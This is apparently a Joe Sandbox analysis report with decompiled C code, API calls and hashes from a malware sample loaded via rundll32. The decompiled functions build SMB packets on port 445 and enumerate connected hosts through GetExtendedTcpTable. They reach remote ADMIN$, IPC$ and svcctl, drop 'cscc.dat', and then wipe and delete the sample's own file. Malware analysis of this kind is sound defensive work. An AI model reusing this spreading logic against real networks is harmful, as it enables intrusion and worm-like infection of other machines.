Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$AllocHandleProcess$CloseThread$Token$AddressCreateCurrentDuplicateModuleOpenProc
String ID: Oet Uet0Xet$WaitForMultipleObjects$kernel32
API String ID: 2880803415-1973291610
Opcode ID: b1188b9a5cfebe86943a2b4629f316e48f6166dd64f6c7c585088265b6a2885f
Instruction ID: c0f7746f1add836e65eb32e4fb27f4c3a7f777a71f0240fab472cf42b3ebbb27
Opcode Fuzzy Hash: b1188b9a5cfebe86943a2b4629f316e48f6166dd64f6c7c585088265b6a2885f
Instruction Fuzzy Hash: B0414F71D1021ABBDF14AFA8DC49BEEB7B4FB48310F208529E511E7290EB789D408B55

Uniqueness

Uniqueness Score: -1.00%

Function 007B1CA3 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 108
memorynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E007B1CA3(intOrPtr _a4, void** _a8, long _a12) {
				char _v5;
				signed int _v12;
				void* _v16;
				void* _t34;
				void* _t41;
				short _t42;
				char _t45;
				char _t46;
				void* _t47;
				signed int _t48;
				intOrPtr* _t56;
				void* _t58;
				void* _t60;
				void* _t61;

				_v5 = 0;
				_t34 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
				_v16 = _t34;
				if(_t34 != 0) {
					_t47 = HeapAlloc(GetProcessHeap(), 8, 0x33);
					if(_t47 != 0) {
						_t58 =  *_a8;
						 *((intOrPtr*)(_t58 + 4)) =  *((intOrPtr*)(_t58 + 4)) + 1;
						_t48 = 9;
						_t41 = memcpy(_t47, _t58, _t48 << 2);
						__imp__#9(0x2f);
						 *(_t47 + 2) = _t41;
						_t42 = 0xc;
						 *((char*)(_t47 + 8)) = 0x72;
						 *((short*)(_t47 + 0x25)) = _t42;
						 *((char*)(_t47 + 0x27)) = 2;
						asm("movsd");
						asm("movsd");
						asm("movsw");
						asm("movsb");
						__imp__#19(_a4, _t47, 0x33, 0); // executed
						if(_t42 > 0) {
							_t60 = _v16;
							__imp__#16(_a4, _t60, 0xffff, 0); // executed
							if(_t42 > 0) {
								_t68 =  *((intOrPtr*)(_t60 + 9));
								if( *((intOrPtr*)(_t60 + 9)) == 0) {
									_t45 = E007B1C3A(0, _t68, _a4, _a8, _a12, _t60);
									_v5 = _t45;
									if(_t45 == 0) {
										_v12 = _v12 & 0x00000000;
										_t56 = 0x7c3478;
										do {
											_t61 = 0;
											while(1) {
												_t23 = _t61 + 0x7c34f0; // 0x7c0494
												_t46 = E007B1747(_a4, _a8, _a12,  *_t56,  *_t23, _v16); // executed
												_v5 = _t46;
												if(_t46 != 0) {
													goto L11;
												}
												_t61 = _t61 + 4;
												if(_t61 < 0xcc) {
													continue;
												} else {
													goto L10;
												}
												goto L11;
											}
											goto L11;
											L10:
											_v12 = _v12 + 4;
											_t56 = _t56 + 4;
										} while (_v12 < 0x78);
									}
								}
							}
						}
						L11:
						HeapFree(GetProcessHeap(), 8, _t47);
					}
					RtlFreeHeap(GetProcessHeap(), 8, _v16); // executed
				}
				return _v5;
			}

0x007b1cb9
0x007b1cc6
0x007b1cc8
0x007b1ccd
0x007b1cdc
0x007b1ce0
0x007b1ce9
0x007b1ceb
0x007b1cf0
0x007b1cf5
0x007b1cf7
0x007b1cff
0x007b1d03
0x007b1d04
0x007b1d08
0x007b1d0c
0x007b1d18
0x007b1d19
0x007b1d1a
0x007b1d1c
0x007b1d26
0x007b1d2e
0x007b1d30
0x007b1d3d
0x007b1d45
0x007b1d47
0x007b1d4a
0x007b1d56
0x007b1d5b
0x007b1d60
0x007b1d62
0x007b1d66
0x007b1d6b
0x007b1d6b
0x007b1d6d
0x007b1d70
0x007b1d81
0x007b1d86
0x007b1d8b
0x00000000
0x00000000
0x007b1d8d
0x007b1d96
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x007b1d96
0x00000000
0x007b1d98
0x007b1d98
0x007b1d9c
0x007b1d9f
0x007b1d6b
0x007b1d60
0x007b1d4a
0x007b1d45
0x007b1da5
0x007b1daf
0x007b1daf
0x007b1dc1
0x007b1dc1
0x007b1dce

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,007B5414,00000000,?,0BADF00D,?,?,?,?,007B943A,?), ref: 007B1CBD
HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A,?), ref: 007B1CC6
GetProcessHeap.KERNEL32(00000008,00000033,?,?,?,?,007B943A,?), ref: 007B1CD7
HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A,?), ref: 007B1CDA
htons.WS2_32(0000002F), ref: 007B1CF7
send.WS2_32(00000033,00000000,00000033,00000000), ref: 007B1D26
recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 007B1D3D

Part of subcall function 007B1747: GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,007B1C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 007B1783
Part of subcall function 007B1747: HeapAlloc.KERNEL32(00000000), ref: 007B178C
Part of subcall function 007B1747: CharUpperW.USER32(00000000), ref: 007B17B2
Part of subcall function 007B1747: GetProcessHeap.KERNEL32(00000008,00000086), ref: 007B17DA
Part of subcall function 007B1747: HeapAlloc.KERNEL32(00000000), ref: 007B17DD
Part of subcall function 007B1747: htons.WS2_32(00000082), ref: 007B1801

GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,007B943A,?), ref: 007B1DA8
HeapFree.KERNEL32(00000000,?,?,?,?,007B943A,?), ref: 007B1DAF
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,007B943A,?), ref: 007B1DBA
RtlFreeHeap.NTDLL(00000000,?,?,?,?,007B943A,?), ref: 007B1DC1

Strings

NT LM 0.12, xrefs: 007B1D13
l|, xrefs: 007B1D66, 007B1D76
Oet Uet0Xet, xrefs: 007B1CAC, 007B1DA8, 007B1DBA
x, xrefs: 007B1D9F

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$Alloc$Freehtons$CharUpperrecvsend
String ID: Oet Uet0Xet$NT LM 0.12$l|$x
API String ID: 2343870972-3302060157
Opcode ID: 13856267a4073938ddb87a167b078ed0b87b521d2fbb02e5d1ec3543242f0373
Instruction ID: 63b9d70407d44df704d16163e1dd6d07b56b8aa69358414545731394d9b45ce2
Opcode Fuzzy Hash: 13856267a4073938ddb87a167b078ed0b87b521d2fbb02e5d1ec3543242f0373
Instruction Fuzzy Hash: E631F332A00245FBEF228FE4CC49F9E7F75BF45310F448069FA08AB152D6798905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 007B5337 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 157
memorynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E007B5337(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v36;
				short _v38;
				char _v40;
				void* __edi;
				signed int _t54;
				int _t56;
				short _t60;
				char* _t61;
				void* _t64;
				void* _t66;
				signed int _t70;
				int _t84;
				void* _t85;
				void* _t89;

				_t85 = __ecx;
				_v20 = 0xbadf00d;
				_t89 = HeapAlloc(GetProcessHeap(), 8, 0x24);
				_v16 = _t89;
				if(_t89 == 0) {
					L19:
					return _v20;
				}
				 *((intOrPtr*)(_t89 + 4)) = 0x424d53fe;
				 *((char*)(_t89 + 0xd)) = 0x18;
				 *((short*)(_t89 + 0xe)) = 0x4801;
				 *((short*)(_t89 + 0x1e)) = 0xfeff;
				_t54 = rand() & 0x80001fff;
				if(_t54 < 0) {
					_t54 = (_t54 - 0x00000001 | 0xffffe000) + 1;
				}
				 *((short*)(_t89 + 0x22)) = _t54 + 0x1000;
				 *((intOrPtr*)(_t89 + 9)) = 0x300;
				_t56 = rand();
				 *(_t89 + 0x10) = _t56;
				__imp__#23(2, 1, 6); // executed
				_t84 = _t56;
				if(_t84 == 0xffffffff) {
					L18:
					HeapFree(GetProcessHeap(), 8, _t89);
					goto L19;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t60 = 2;
				_v40 = _t60;
				__imp__#9(0x1bd);
				_v38 = _t60;
				__imp__#11(_a4);
				_v36 = 0;
				_t61 =  &_v40;
				__imp__#4(_t84, _t61, 0x10); // executed
				if(_t61 == 0xffffffff) {
					L16:
					_v20 = 0xc0c0c0c;
					L17:
					__imp__#3(_t84); // executed
					goto L18;
				}
				_t64 = E007B1CA3(_t84,  &_v16,  &_v20); // executed
				if(_t64 == 0) {
					_t89 = _v16;
					goto L16;
				}
				_v24 = _v24 & 0x00000000;
				_t88 =  &_v16;
				_t66 = E007B2191( &_v16, _t84, _a4,  &_v24); // executed
				if(_t66 == 0) {
					_v20 = 0xc0c0c0c;
				} else {
					_t90 = _v16;
					_t70 = E007B46C7(_t85, _t84, _a4, _v16,  &_v24, _v20); // executed
					_v20 = _t70;
					E007B21DC(_t84, _t88,  &_v24); // executed
					if(_v20 == 0) {
						_v20 = 0xf0f0f0f;
						if(E007B1EB9(_t84, _t88, _a4, "ADMIN$") != 0 && E007B2054(_t84, _t90,  &_v12, "cscc.dat", 1) == 0 && E007B4AB5(_a20, _t85, _t84, _t90,  &_v24, _a12, _a16) != 0 && E007B516B(_t85, _t84, _t90, _a4, _a8, _a12) != 0) {
							_v20 = _v20 & 0x00000000;
						}
					}
				}
				E007B1DD1(_t85, _t84,  &_v16); // executed
				_t89 = _v16;
				goto L17;
			}

0x007b5337
0x007b5344
0x007b5358
0x007b535a
0x007b535f
0x007b54fd
0x007b5504
0x007b5504
0x007b536b
0x007b5372
0x007b537b
0x007b5384
0x007b538a
0x007b538f
0x007b5397
0x007b5397
0x007b539d
0x007b53a1
0x007b53a8
0x007b53b0
0x007b53b4
0x007b53ba
0x007b53bf
0x007b54ed
0x007b54f7
0x00000000
0x007b54f7
0x007b53ca
0x007b53cb
0x007b53cc
0x007b53cf
0x007b53d0
0x007b53d6
0x007b53da
0x007b53e3
0x007b53e7
0x007b53ed
0x007b53f2
0x007b53f7
0x007b5400
0x007b54df
0x007b54df
0x007b54e6
0x007b54e7
0x00000000
0x007b54e7
0x007b540f
0x007b5416
0x007b54dc
0x00000000
0x007b54dc
0x007b541c
0x007b5427
0x007b542b
0x007b5432
0x007b54c6
0x007b5438
0x007b543b
0x007b5447
0x007b544c
0x007b5457
0x007b5460
0x007b546e
0x007b547c
0x007b54c0
0x007b54c0
0x007b547c
0x007b5460
0x007b54d2
0x007b54d7
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,00000024,0000FDE9,74656840,00000000,?,?,?,?,007B943A,?), ref: 007B534B
HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A,?), ref: 007B5352
rand.MSVCRT ref: 007B5388
rand.MSVCRT ref: 007B53A8
socket.WS2_32(00000002,00000001,00000006), ref: 007B53B4
htons.WS2_32(000001BD), ref: 007B53DA
inet_addr.WS2_32(?), ref: 007B53E7
connect.WS2_32(00000000,?,00000010), ref: 007B53F7

Part of subcall function 007B516B: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 007B51D3
Part of subcall function 007B516B: HeapAlloc.KERNEL32(00000000), ref: 007B51DC
Part of subcall function 007B516B: GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 007B5205
Part of subcall function 007B516B: HeapAlloc.KERNEL32(00000000), ref: 007B5208
Part of subcall function 007B516B: rand.MSVCRT ref: 007B521B
Part of subcall function 007B516B: rand.MSVCRT ref: 007B5226
Part of subcall function 007B516B: rand.MSVCRT ref: 007B522F
Part of subcall function 007B516B: sprintf.MSVCRT ref: 007B5246
Part of subcall function 007B516B: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,007B943A), ref: 007B5252
Part of subcall function 007B516B: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,007B943A), ref: 007B5255

closesocket.WS2_32(00000000), ref: 007B54E7
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,007B943A,?), ref: 007B54F0
HeapFree.KERNEL32(00000000,?,?,?,?,007B943A,?), ref: 007B54F7

Strings

Oet Uet0Xet, xrefs: 007B534B, 007B54F0
ADMIN$, xrefs: 007B5462
cscc.dat, xrefs: 007B5480

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Processrand$Alloc$Freeclosesocketconnecthtonsinet_addrsocketsprintf
String ID: Oet Uet0Xet$ADMIN$$cscc.dat
API String ID: 228017060-2485865258
Opcode ID: 3d2fc52da86ca60cd0f73340177c8efb81a78e3a28ceae8f519e1fa2bd2f90c8
Instruction ID: 44f888d2e4a9a9735e0ea965a5ad4ca749274a5af3059275ac16f9f1bd742f49
Opcode Fuzzy Hash: 3d2fc52da86ca60cd0f73340177c8efb81a78e3a28ceae8f519e1fa2bd2f90c8
Instruction Fuzzy Hash: F0516C71900349BADB209FA4CC49FEF7BB8FF08355F008904F915A7292D3789944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 007B733C Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 86
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E007B733C(intOrPtr _a4) {
				signed int _v8;
				long _v12;
				void* _v16;
				struct HINSTANCE__* _v20;
				short _v84;
				void* __esi;
				struct HINSTANCE__* _t20;
				void* _t27;
				signed int _t29;
				void* _t41;
				intOrPtr* _t45;
				signed char* _t47;
				void* _t50;
				void* _t52;

				_t41 = 0;
				_t20 = LoadLibraryW(L"iphlpapi.dll");
				_v20 = _t20;
				if(_t20 != 0) {
					_t45 = GetProcAddress(_t20, "GetExtendedTcpTable");
					if(_t45 == 0) {
						GetLastError();
					} else {
						_v12 = 0x100000;
						_t27 = RtlAllocateHeap(GetProcessHeap(), 8, 0x100000); // executed
						_t50 = _t27;
						_v16 = _t50;
						if(_t50 != 0) {
							_t29 =  *_t45(_t50,  &_v12, 0, 2, 1, 0); // executed
							asm("sbb ebx, ebx");
							_t41 =  ~_t29 + 1;
							if(_t41 != 0) {
								_v8 = _v8 & 0x00000000;
								if( *_t50 > 0) {
									_t7 = _t50 + 0x12; // 0x12
									_t47 = _t7;
									do {
										if( *((intOrPtr*)(_t47 - 0xe)) == 5) {
											wsprintfW( &_v84, L"%u.%u.%u.%u",  *(_t47 - 2) & 0x000000ff,  *(_t47 - 1) & 0x000000ff,  *_t47 & 0x000000ff, _t47[1] & 0x000000ff);
											_t52 = _t52 + 0x18;
											E007B6B95( &_v84, 0, _a4);
											_t50 = _v16;
										}
										_v8 = _v8 + 1;
										_t47 =  &(_t47[0x14]);
									} while (_v8 <  *_t50);
								}
							}
							RtlFreeHeap(GetProcessHeap(), 0, _t50); // executed
						}
					}
					FreeLibrary(_v20);
				}
				return _t41;
			}

0x007b7348
0x007b734a
0x007b7350
0x007b7355
0x007b7369
0x007b736d
0x007b7414
0x007b7373
0x007b737b
0x007b7385
0x007b738b
0x007b738d
0x007b7392
0x007b73a3
0x007b73a9
0x007b73ab
0x007b73ac
0x007b73ae
0x007b73b5
0x007b73b7
0x007b73b7
0x007b73ba
0x007b73be
0x007b73dc
0x007b73e2
0x007b73ed
0x007b73f2
0x007b73f2
0x007b73f5
0x007b73fb
0x007b73fe
0x007b73ba
0x007b73b5
0x007b740c
0x007b740c
0x007b7392
0x007b741d
0x007b7424
0x007b7429

APIs

LoadLibraryW.KERNEL32(iphlpapi.dll,00000000), ref: 007B734A
GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 007B7363
GetProcessHeap.KERNEL32(00000008,00100000), ref: 007B737E
RtlAllocateHeap.NTDLL(00000000), ref: 007B7385
GetExtendedTcpTable.IPHLPAPI(00000000,?,00000000,00000002,00000001,00000000), ref: 007B73A3
wsprintfW.USER32 ref: 007B73DC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B7405
RtlFreeHeap.NTDLL(00000000), ref: 007B740C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B7856), ref: 007B7414
FreeLibrary.KERNEL32(?), ref: 007B741D

Strings

%u.%u.%u.%u, xrefs: 007B73D6
GetExtendedTcpTable, xrefs: 007B735D
Oet Uet0Xet, xrefs: 007B737E, 007B7405
iphlpapi.dll, xrefs: 007B7343

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$FreeLibraryProcess$AddressAllocateErrorExtendedLastLoadProcTablewsprintf
String ID: Oet Uet0Xet$%u.%u.%u.%u$GetExtendedTcpTable$iphlpapi.dll
API String ID: 2031097080-2088648562
Opcode ID: af3133828bf09bbbdcca513ae028c173566904f41d81c7f896b4f62c0b64ef4a
Instruction ID: a434a9b46eb89fb5ad9d7347b1e5583ce9632ede50ea2adc3788610260d32c19
Opcode Fuzzy Hash: af3133828bf09bbbdcca513ae028c173566904f41d81c7f896b4f62c0b64ef4a
Instruction Fuzzy Hash: E4217172904296ABCB215FA88C49FEEBBB8FF49302F144665F541E6181E778D900CB64

Uniqueness

Uniqueness Score: -1.00%

Function 007B9154 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 81
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B9154(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long _v8;
				void* _v12;
				void* _v16;
				int _t16;
				void* _t18;
				int _t19;
				void* _t22;
				void* _t24;
				char _t31;

				_t16 = FreeLibrary( *0x7c7b98); // executed
				 *0x7c7b8c = _t16;
				if(_t16 == 0) {
					return _t16;
				}
				_t31 = CreateFileW;
				 *0x7c7b98 =  *0x7c7bb4; // executed
				_t18 = CreateFileW(0x7c7bc8, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v12 = _t18;
				if(_t18 != 0) {
					_v8 = GetFileSize(_t18, 0);
					FindCloseChangeNotification(_v12); // executed
					_t22 = CreateFileW(0x7c7bc8, 0x40000000, 0, 0, 2, 0, 0); // executed
					_v12 = _t22;
					if(_t22 != 0) {
						_t31 = " Oet Uet0Xet";
						_t24 = RtlAllocateHeap(GetProcessHeap(), 8, _v8); // executed
						_v16 = _t24;
						if(_t24 != 0) {
							_t30 =  &_v8;
							WriteFile(_v12, _t24, _v8,  &_v8, 0); // executed
							HeapFree(GetProcessHeap(), 0, _v16);
						}
						CloseHandle(_v12);
					}
				}
				_t19 = DeleteFileW(0x7c7bc8); // executed
				 *0x7c7b84 = _t19; // executed
				_t16 = E007B9016(); // executed
				if(_t16 != 0) {
					_t16 = E007B79D7(0x7c7bc8, _t30, _t31, _a4, _a8, _a12, _a16); // executed
				}
				ExitProcess(0);
			}

0x007b9161
0x007b9169
0x007b9170
0x007b923c
0x007b923c
0x007b917b
0x007b9193
0x007b9198
0x007b919a
0x007b919f
0x007b91ac
0x007b91af
0x007b91c1
0x007b91c3
0x007b91c8
0x007b91cd
0x007b91d8
0x007b91de
0x007b91e3
0x007b91e6
0x007b91f1
0x007b91fe
0x007b91fe
0x007b9207
0x007b9207
0x007b91c8
0x007b920e
0x007b9214
0x007b9219
0x007b9220
0x007b922e
0x007b922e
0x007b9234

APIs

FreeLibrary.KERNELBASE ref: 007B9161
CreateFileW.KERNELBASE(007C7BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007B9198
GetFileSize.KERNEL32(00000000,00000000), ref: 007B91A3
FindCloseChangeNotification.KERNELBASE(?), ref: 007B91AF
CreateFileW.KERNELBASE(007C7BC8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 007B91C1
GetProcessHeap.KERNEL32(00000008,?), ref: 007B91D5
RtlAllocateHeap.NTDLL(00000000), ref: 007B91D8
WriteFile.KERNELBASE(?,00000000,?,?,00000000), ref: 007B91F1
GetProcessHeap.KERNEL32(00000000,?), ref: 007B91FB
HeapFree.KERNEL32(00000000), ref: 007B91FE
CloseHandle.KERNEL32(?), ref: 007B9207
DeleteFileW.KERNELBASE(007C7BC8), ref: 007B920E
ExitProcess.KERNEL32 ref: 007B9234

Strings

Uet0Xet, xrefs: 007B91FE

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: File$Heap$Process$CloseCreateFree$AllocateChangeDeleteExitFindHandleLibraryNotificationSizeWrite
String ID: Uet0Xet
API String ID: 1556359713-1689521831
Opcode ID: e3a3c502abbe36832c9c4fcd36e165bdc951aa1cca1a3480126c481ba4482817
Instruction ID: 59f71a14ed0629940b289262bf4a6556acc2e8a8b7cfe24f272513eb8125a2d2
Opcode Fuzzy Hash: e3a3c502abbe36832c9c4fcd36e165bdc951aa1cca1a3480126c481ba4482817
Instruction Fuzzy Hash: 302119B1801218BBCB216FA1AC4CECEBF79FF49310F108555FA15A2160EA388A51DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 007B1EB9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 161
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E007B1EB9(intOrPtr _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				char _v5;
				long _v12;
				void* _v16;
				signed short _v20;
				void* _t49;
				intOrPtr* _t51;
				intOrPtr* _t53;
				signed short _t56;
				long _t58;
				void* _t66;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t74;
				void* _t77;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t82;
				void* _t88;
				intOrPtr _t89;
				void* _t90;
				signed int _t91;
				char _t93;
				intOrPtr _t94;
				short _t95;
				intOrPtr _t96;
				char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				void* _t101;
				intOrPtr _t102;
				intOrPtr* _t103;
				void* _t104;
				void* _t106;
				void* _t112;
				intOrPtr* _t118;
				void* _t119;
				void* _t120;
				intOrPtr* _t121;
				void* _t122;
				void* _t124;

				_v5 = 0;
				_t49 = RtlAllocateHeap(GetProcessHeap(), 8, 0xffff); // executed
				_v16 = _t49;
				if(_t49 == 0) {
					L24:
					return _v5;
				}
				_t51 = _a12;
				_t101 = _t51 + 1;
				do {
					_t89 =  *_t51;
					_t51 = _t51 + 1;
				} while (_t89 != 0);
				_t90 = _t51 - _t101;
				_t53 = _a16;
				_t106 = _t53 + 1;
				do {
					_t102 =  *_t53;
					_t53 = _t53 + 1;
				} while (_t102 != 0);
				_t56 = _t90 + _t53 - _t106 + 0x0000000b & 0x0000ffff;
				_v20 = _t56;
				_t58 = (_t56 & 0x0000ffff) + 0x2f;
				_v12 = _t58;
				_t88 = HeapAlloc(GetProcessHeap(), 8, _t58);
				if(_t88 == 0) {
					L23:
					HeapFree(GetProcessHeap(), 8, _v16);
					goto L24;
				}
				_t91 = 9;
				_t66 = memcpy(_t88,  *_a8, _t91 << 2);
				__imp__#9(_v12 + 0xfffffffc);
				_t103 = _a12;
				 *(_t88 + 2) = _t66;
				 *((short*)(_t88 + 0x2b)) = 1;
				 *((short*)(_t88 + 0x2d)) = _v20;
				 *((char*)(_t88 + 8)) = 0x75;
				 *((short*)(_t88 + 0x24)) = 0xff04;
				asm("movsw");
				_t22 = _t88 + 0x32; // 0x32
				asm("movsb");
				_t118 = _t103;
				_t71 = _t22 - _t103;
				do {
					_t93 =  *_t118;
					 *((char*)(_t71 + _t118)) = _t93;
					_t118 = _t118 + 1;
				} while (_t93 != 0);
				_t72 = _t103;
				_t119 = _t72 + 1;
				do {
					_t94 =  *_t72;
					_t72 = _t72 + 1;
				} while (_t94 != 0);
				_t95 = 0x5c;
				 *((short*)(_t72 - _t119 + _t88 + 0x32)) = _t95;
				_t74 = _t103;
				_t120 = _t74 + 1;
				do {
					_t96 =  *_t74;
					_t74 = _t74 + 1;
				} while (_t96 != 0);
				_t121 = _a16;
				_t77 = _t74 - _t120 + _t88 + 0x33 - _t121;
				do {
					_t97 =  *_t121;
					 *((char*)(_t77 + _t121)) = _t97;
					_t121 = _t121 + 1;
				} while (_t97 != 0);
				_t78 = _t103;
				_t104 = _t78 + 1;
				do {
					_t98 =  *_t78;
					_t78 = _t78 + 1;
				} while (_t98 != 0);
				_t122 = _t78 - _t104;
				_t80 = _a16;
				_t112 = _t80 + 1;
				do {
					_t99 =  *_t80;
					_t80 = _t80 + 1;
				} while (_t99 != 0);
				_t82 = _t80 - _t112 + _t122;
				asm("movsd");
				asm("movsw");
				__imp__#19(_a4, _t88, _v12, 0); // executed
				if(_t82 > 0) {
					_t124 = _v16;
					__imp__#16(_a4, _t124, 0xffff, 0); // executed
					if(_t82 > 0 &&  *((intOrPtr*)(_t124 + 9)) == 0) {
						 *((short*)( *_a8 + 0x1c)) =  *((intOrPtr*)(_t124 + 0x1c));
						_v5 = 1;
					}
				}
				HeapFree(GetProcessHeap(), 8, _t88);
				goto L23;
			}

0x007b1ece
0x007b1edb
0x007b1edd
0x007b1ee2
0x007b204b
0x007b2051
0x007b2051
0x007b1ee8
0x007b1eeb
0x007b1eee
0x007b1eee
0x007b1ef0
0x007b1ef1
0x007b1ef7
0x007b1ef9
0x007b1efd
0x007b1f00
0x007b1f00
0x007b1f02
0x007b1f03
0x007b1f0d
0x007b1f10
0x007b1f16
0x007b1f1c
0x007b1f24
0x007b1f28
0x007b2038
0x007b2044
0x00000000
0x007b204a
0x007b1f38
0x007b1f3f
0x007b1f41
0x007b1f47
0x007b1f4a
0x007b1f51
0x007b1f59
0x007b1f5d
0x007b1f61
0x007b1f6f
0x007b1f71
0x007b1f74
0x007b1f75
0x007b1f77
0x007b1f79
0x007b1f79
0x007b1f7b
0x007b1f7e
0x007b1f7f
0x007b1f83
0x007b1f85
0x007b1f88
0x007b1f88
0x007b1f8a
0x007b1f8b
0x007b1f93
0x007b1f94
0x007b1f99
0x007b1f9b
0x007b1f9e
0x007b1f9e
0x007b1fa0
0x007b1fa1
0x007b1fa7
0x007b1fae
0x007b1fb0
0x007b1fb0
0x007b1fb2
0x007b1fb5
0x007b1fb6
0x007b1fba
0x007b1fbc
0x007b1fbf
0x007b1fbf
0x007b1fc1
0x007b1fc2
0x007b1fc8
0x007b1fca
0x007b1fcd
0x007b1fd0
0x007b1fd0
0x007b1fd2
0x007b1fd3
0x007b1fd9
0x007b1fe4
0x007b1fe5
0x007b1ff1
0x007b1ff9
0x007b1ffb
0x007b2008
0x007b2010
0x007b2020
0x007b2024
0x007b2024
0x007b2010
0x007b2032
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,007B943A), ref: 007B1ED2
RtlAllocateHeap.NTDLL(00000000,?,?,?,?,007B943A), ref: 007B1EDB
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,007B943A), ref: 007B1F1F
HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B1F22
